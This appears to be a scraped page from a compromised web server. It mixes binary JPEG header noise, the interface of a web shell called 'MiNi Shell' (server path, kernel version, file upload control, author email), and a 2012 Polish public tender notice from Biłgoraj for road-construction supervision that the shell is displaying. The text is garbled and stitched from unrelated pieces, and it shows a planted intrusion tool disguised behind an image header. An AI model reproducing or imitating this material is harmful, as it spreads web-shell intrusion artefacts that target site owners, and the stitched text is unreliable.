JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121220/522256-N-2012.html

<p class="kh_header"><b>Biłgoraj: Świadczenie usług związanych   z pełnieniem funkcji inspektora nadzoru przy realizacji inwestycji pn. Budowa Obwodnicy Północnej w Biłgoraju.</b><br>
<b>Numer ogłoszenia: 522256 - 2012; data zamieszczenia: 20.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Biłgoraj , Plac  Wolności 16, 23-400 Biłgoraj, woj. lubelskie, tel. 84 6869600, faks 84 6869665.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bilgoraj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług związanych   z pełnieniem funkcji inspektora nadzoru przy realizacji inwestycji pn. Budowa Obwodnicy Północnej w Biłgoraju..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zadania na którym będzie pełniona funkcja Inspektora nadzoru obejmuje n/w obiekty i roboty: 
- budowa drogi obwodowej (klasy technicznej G) łączącej DW nr 835 (ul. Aleja Jana Pawła II), z DW  nr 858( ul. Zamojska) o łącznej długości ok. 2,6km
- przebudowa skrzyżowań z ul. Al. Jana Pawła II, ul. Zamojską, ul. Moniuszki i ul. Szwajcarską  
- budowa nowego przebiegu ul. Dworcowej od terenów kolejowych do ul. Szwajcarskiej o łącznej   długości 525m
-odcinek remontowany ul. Dworcowej
- budowa dwóch małych rond na początku i na końcu zakresu opracowania oraz ronda typu     półturbina na skrzyżowaniu z ul. Moniuszki
- budowa zjazdów indywidualnych i zjazdów publicznych wzdłuż projektowanej drogi                         - budowa drogi serwisowej o długości około 225m, zapewniającej dojazd do posesji prywatnych (rejon
   ul. Moniuszki)
- budowa mostu na rzece Biała Łada
- budowa ścieżki rowerowej oraz chodnika 
- budowa oświetlenia ulicznego
- budowa kanalizacji deszczowej
- budowa przepustów pod projektowaną drogą obwodową oraz innymi drogami znajdującymi się         w zakresie opracowania
-zabezpieczenie istniejącej zabudowy przed hałasem (budowa ekranów akustycznych)     
- budowa muru oporowego o dł. około 30mb.
-zabezpieczenia i przebudowy istniejącej infrastruktury technicznej kolidującej z przedmiotową  inwestycją (sieci gazowe, sieci wodociągowe, sieci energetyczne, sieci teletechniczne)
- rozbiórka budynków kolidujących z inwestycją
- wycinka drzew kolidujących z inwestycją oraz wykonanie zieleni drogowej
W/w roboty będą realizowane w zakresie n/w branż:
DROGOWA
DROGOWA-PRZEPUSTY
ELEKTRYCZNA - OŚWIETLENIE DROGOWE
ELEKTRYCZNA - PRZEBUDOWA SIECI nN - PKP Polskie Linie Kolejowe
ELEKTRYCZNA - PRZEBUDOWA SIECI nN - ZKE
ELEKTRYCZNA - PRZEBUDOWA SIECI SN - PKP ENERGETYKA
ELEKTRYCZNA - PRZEBUDOWA SIECI SN - ZKE
GAZOWA
HYDROTECHNICZNA
KANALIZACJA DESZCZOWA
KONSTRUKCYJNO-BUDOWLANA - EKRANY AKUSTYCZNE
KONSTRUKCYJNO-BUDOWLANA - MUR OPOROWY
MOSTOWA
TELETECHNICZNA - MULTIMEDIA
TELETECHNICZNA - Przebudowa urządzeń teletechnicznych - PKP
TELETECHNICZNA - Przebudowa urządzeń teletechnicznych - TP S.A.
WODOCIĄGOWA
ELEKTRYCZNA - ZASILANIE OŚWIETLENIA DROGOWEGO
ZIELEŃ.
3. Opis przedmiotu  zamówienia 
1.  Wykonawca zobowiązuje się do pełnienia nadzoru inwestorskiego dla zadania inwestycyjnego       w następujących okresach:
a) w okresie realizacji zadania: od dnia podpisania umowy do dnia uzyskania przez Zamawiającego ostatecznej decyzji pozwolenia na użytkowanie obiektu budowlanego zrealizowanego w ramach inwestycji;
b) w okresie gwarancji i rękojmi: od dnia dokonania odbioru końcowego zadania, do dnia, w którym upłynie okres gwarancji i rękojmi udzielonej przez wykonawcę robót, tj. 5 lat, bądź do dnia usunięcia wad lub usterek ujawnionych w okresie gwarancji i rękojmi, a usuwanych po zakończeniu w/w okresów.

2. W ramach realizacji przedmiotu zamówienia, Wykonawca pełnić będzie obowiązki i funkcje Inspektora Nadzoru Inwestorskiego, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2006 r., Nr 156, poz.1118 z późn. zm.), w następujących specjalnościach:
a)drogowo mostowej, bez ograniczeń;
b) instalacyjnej w zakresie sieci, instalacji i urządzeń, gazowych, wodociągowych i kanalizacyjnych, bez ograniczeń;
c) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych, elektroenergetycznych                   i teletechnicznych, bez ograniczeń.
d) inni inspektorzy , pracownicy w zależności od potrzeb
3. W ramach pełnienia funkcji Inspektora Nadzoru Inwestorskiego, do obowiązków Wykonawcy należy w szczególności:
1) zapoznanie się z opracowaniami projektowymi, umowami o wykonanie robót, warunkami pozwolenia na budowę, terenem, i jego uzbrojeniami - przed wejściem wykonawców robót budowlanych na plac budowy;

2). Reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji             z projektem i pozwoleniem na budowę, specyfikacją techniczną wykonania i odbioru robót, obowiązującymi normami i przepisami, w tym przepisami techniczno - budowlanymi;

3)  Protokólarne wprowadzenie wykonawcy robót budowlanych na plac budowy;

4) Uczestniczenie we wszelkich czynnościach, do dokonania których zobowiązany jest Zamawiający,  a dotyczących realizowanych przez Wykonawcę robót budowlanych w okresie obowiązywania niniejszej umowy, w tym uczestniczenie w naradach technicznych, problemowych         i innych organizowanych przez strony procesu inwestycyjnego;

5) Współpraca z Zamawiającym, jednostką projektową i wykonawcą robót budowlanych w zakresie realizowanych robót budowlanych, w tym stałe konsultowanie i fachowe doradztwo na rzecz Zamawiającego celem wspólnego poszukiwania rozwiązań bieżących problemów.
Pisemne informowanie Zamawiającego o postępie robót na budowie i ewentualnych trudnościach       w ich realizacji - według potrzeb, nie rzadziej jednak niż raz w miesiącu;

6) Weryfikacja dokumentów dostarczonych przez wykonawcę robót budowlanych związanych              z odbiorami robót budowlanych (odbiorów częściowych, odbiorów procentowego zaawansowania robót, odbiorów robót zanikających i ulegających zakryciu, odbioru końcowego), w tym m.in.: atestów, certyfikatów, świadectw jakości, wyników badań, w tym laboratoryjnych itp., sprawdzanie obmiarów wykonanych robót (książki obmiarów) i protokołów oraz kontrola materiałów i urządzeń przed ich wbudowaniem, zatwierdzanie receptur i technologii zgodnie z SST w terminie 7 dni od złożenia przez wykonawcę robót budowlanych.; 

7)  Weryfikowanie pomiarów geodezyjnych, wytyczenia i zainwentaryzowania obiektów budowlanych oraz sprawdzanie i potwierdzanie prawidłowości dokumentów rozliczeniowych oraz dokumentacji powykonawczej;

8) Sprawdzenie pod względem merytorycznym i formalnym oraz rachunkowym protokołu odbioru       w zakresie wykonywanych robót oraz zgodności przedkładanych przez Wykonawcę robót budowlanych faktur z umową, kontrola ilości i wartości wykonanych robót budowlanych przed odbiorami częściowymi, odbiorami procentowego zaawansowania robót, odbiorami robót zanikających                 i ulegających zakryciu, odbiorem końcowym oraz kontrola prawidłowości wykonania zafakturowanych robót;

9). Sprawdzanie jakości wykonanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania        w budownictwie;

10) Dokonywanie odbiorów robót budowlanych (odbiorów częściowych, odbiorów procentowego zaawansowania robót, odbiorów robót zanikających i ulegających zakryciu, odbioru końcowego) potwierdzanych stosownymi zapisami w dzienniku budowy, zgodnie z obowiązującymi w tym zakresie przepisami prawa, normami budowlanymi oraz specyfikacjami technicznymi wykonania i odbioru robót budowlanych inwestycji oraz udział w przekazaniu obiektu budowlanego do użytkowania;

11) Dokonywanie odbiorów robót zanikających i ulegających zakryciu wraz z wpisem w dzienniku budowy;

12) Uczestniczenie w pobieraniu próbek do badań laboratoryjnych, materiałów dostarczonych do wbudowania oraz kontrola prawidłowości ich pobierania;

13) Udział w komisji powołanej przez Zamawiającego do określenia ewentualnych robót zamiennych, sprawdzenie pod względem merytorycznym konieczności wykonania robót zamiennych zaproponowanych przez komisję;

14) Uzgadnianie z Zamawiającym i Wykonawcą robót budowlanych - cen jednostkowych zastosowania zamiennych rozwiązań, materiałów i urządzeń;

15) Kompletowanie dokumentów koniecznych do przeprowadzenia odbioru końcowego i uzyskania ostatecznej decyzji pozwolenia na użytkowanie obiektu budowlanego zrealizowanego w ramach inwestycji wraz z ich wyspecyfikowaniem i potwierdzeniem kompletności;

16) Potwierdzanie w dzienniku budowy zapisu kierownika budowy o gotowości obiektu budowlanego lub robót budowlanych do odbioru (po zakończeniu robót budowlanych i wykonaniu niezbędnych prób i sprawdzeń przewidzianych w przepisach odrębnych) oraz nadzór nad należytym urządzeniem 
i uporządkowaniem terenu inwestycji przez wykonawcę robót budowlanych;

17) Współdziałanie w imieniu Zamawiającego z osobami sprawującymi nadzór autorski w sprawach dotyczących realizacji robót budowlanych inwestycji i rozwiązywania bieżących problemów technicznych zgłaszanych przez wykonawcę oraz przekazywanie wykonawcy robót budowlanych zaleceń osób sprawujących nadzór autorski;

18) Przygotowanie, przy udziale Zamawiającego wniosku dotyczącego uzyskania decyzji o pozwoleniu na użytkowanie obiektu;

19) Uczestniczenie, na wezwanie Zamawiającego w przeglądach gwarancyjnych obiektu budowlanego zrealizowanego w ramach inwestycji, w tym sporządzanie ewentualnych protokołów ujawnionych wad i usterek;

20) Nadzór na budowie każdego branżowego inspektora nadzoru w każdym dniu wykonywania robót danej branży co najmniej w godzinach 7.30 - 15.30 i na każde żądanie zamawiającego. Pobyt inspektora na budowie winien być potwierdzony wpisem na listę obecności dostępnej w biurze budowy. W razie nieobecności któregokolwiek z inspektorów wynikającej z choroby lub innej przyczyny losowej, należy zapewnić zastępstwo;

21)  Nadzorowanie przestrzegania przez wykonawców zasad bhp, ustaleń planu BIOZ;

22) Zawiadomienie odpowiednich organów o wypadkach naruszenia prawa budowlanego stwierdzonych w toku realizacji budowy, dotyczących bezpieczeństwa;

23) Przekazywanie Zamawiającemu wystawianych przez wykonawcę robót budowlanych faktur, podlegających jego weryfikacji niezwłocznie, lecz nie później niż w terminie do 3 dni od dnia ich otrzymania;

24) Organizowanie i prowadzenie rady budowy nie rzadziej niż raz w miesiącu;

25)  Sporządzenie dokumentacji fotograficznej z postępu robót;

26) Uzyskiwanie od projektanta wyjaśnień w przypadku wątpliwości dotyczących dokumentacji projektowej i zawartych w niej rozwiązań.

3.1
Inspektor nadzoru zapewni sobie na czas trwania budowy pomieszczenie biurowe umożliwiające prowadzenia narad dla około 20 osób zlokalizowane w obrębie Miasta Biłgoraj. Biuro należy wyposażyć w łącze telefoniczne i internetowe.

3.2
Wymagania niezbędne do określenia standardu i jakości wykonania robót, właściwości wyrobów oraz oceny prawidłowości wykonania robót określa: dokumentacja projektowa dołączona do specyfikacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Obowiązuje wniesienie wadium w wysokości 15 000,00 zł(piętnaście tysiecy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że należycie wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usługi polegające na nadzorze robot drogowych wraz z uzbrojeniem o wartości robót co najmniej 3 000 000 zł każda, - poparte dokumentami potwierdzającymi, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować na czas   realizacji zadania wykwalifikowanym personelem bezpośrednio zatrudnionym do wykonania zamówienia tj:
 Kierownik zespołu - inspektor nadzoru robót drogowych wymagania: wykształcenie wyższe techniczne budowlane, uprawnienia budowlane bez ograniczeń w specjalności drogowej oraz co najmniej 3 letnie doświadczenie zawodowe w nadzorowaniu kontraktów budowlanych - drogowych.
Inspektor nadzoru robot mostowych wymagania: wskazana osoba winna posiadać uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności mostowej oraz co najmniej 3 - letnie doświadczenie zawodowe na stanowisku Inspektora Nadzoru w specjalności mostowej.
Inspektor nadzoru robot wodociągowych, gazowych i kanalizacyjnych wymagania: wskazana osoba winna posiadać uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej    w zakresie sieci i urządzeń wod-kan oraz gazowych oraz co najmniej 3- letnie doświadczenie na stanowisku Inspektora Nadzoru w specjalności j/w.
Inspektor nadzoru robót elektrycznych wymagania: wskazana osoba winna posiadać uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz co najmniej 3- letnie doświadczenie zawodowe na stanowisku Inspektora Nadzoru w specjalności j/w.
Inspektor nadzoru robót teletechnicznych wymagania: wskazana osoba winna posiadać uprawnienia budowlane  do kierowania  robotami budowlanymi bez ograniczeń w specjalności telekomunikacyjnej oraz co najmniej 3 - letnie doświadczenie zawodowe na stanowisku Inspektora Nadzoru w specjalności j/w.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zmiany terminu realizacji zamówienia: 
Zmiana terminu wykonania zamówienia w przypadku dokonania zmiany terminu wykonania robót budowlanych, dotyczących budowy obwodnicy północnej w Biłgoraju
2) Innych zmian w następujących sytuacjach: 
a) zmiany dotyczące nazwy, siedziby Wykonawcy lub jego formy organizacyjno-prawnej w trakcie trwania umowy, numerów kont bankowych oraz innych danych identyfikacyjnych;
b) zmiany wynagrodzenia brutto - w przypadku ustawowej zmiany podatku od towarów usług VAT.
Warunkiem dokonania zmian o których mowa wyżej jest złożenie uzasadnionego wniosku przez stronę inicjującą zmianę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.bilgoraj.pl- zamowienia publiczne.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Miasta Biłgoraj, Plac Wolności 16, 23-400 Biłgoraj..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.01.2013 godzina 09:00, miejsce: Urzad Miasta Biłgoraj, Plac Wolności 16,23-400 Biłgoraj( pokój nr 13, sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie będzie współfinansowane ze śodkow Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Rozwoju Polski Wschodniej 2007-2013, Oś Prrorytetowa IV Inrastruktura Transportowa, Działanie IV.1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com